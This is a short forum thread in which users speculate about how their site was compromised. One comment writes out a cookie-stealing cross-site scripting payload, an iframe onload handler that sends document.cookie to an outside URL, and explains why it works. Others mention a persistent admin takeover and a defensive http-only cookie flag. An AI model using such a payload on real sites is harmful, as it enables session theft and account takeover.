Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin users session cookie.-- smart, pretty, sane. pick two - georgeha[ Parent ]
<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />
So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.
I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.
I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".
If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.
A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.
Note to self. Add "http-only" flag to cookies. Not that it helps for firefox.-- smart, pretty, sane. pick two - georgeha[ Parent ]
The long and short of it is that it's what we said.
